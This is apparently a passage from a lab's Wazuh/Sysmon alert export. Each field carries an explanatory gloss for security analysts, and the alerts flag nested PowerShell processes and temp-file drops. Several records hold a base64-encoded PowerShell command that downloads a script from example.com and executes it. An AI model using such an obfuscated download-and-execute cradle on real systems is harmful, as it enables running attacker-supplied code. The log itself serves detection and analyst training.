ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:33.660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c165-680a-d60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 120 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535343.2705639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:40.0213264Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350331 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:39.967
ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00}
ProcessId: 7424
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1
CreationUtcTime: 2025-04-24 22:55:39.967
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:39.967 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c165-680a-d60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:39.967 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 117 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535344.2708404 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:42.7324746Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350363 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:41.633
ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00}
ProcessId: 9948
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c165-680a-d60c-000000000e00}
ParentProcessId: 7424
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:41.633 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c16d-680a-df0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 7424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 121 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535344.2716467 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:42.9929079Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350364 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:42.952
ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00}
ProcessId: 9948
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gaycvjfa.rkm.ps1
CreationUtcTime: 2025-04-24 22:55:42.952
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:42.952 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c16d-680a-df0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gaycvjfa.rkm.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:42.952 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 118 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535347.2719232 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:45.1744811Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350392 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:44.004
ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00}
ProcessId: 9224
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00}
ParentProcessId: 9948
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:44.004 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c170-680a-e10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
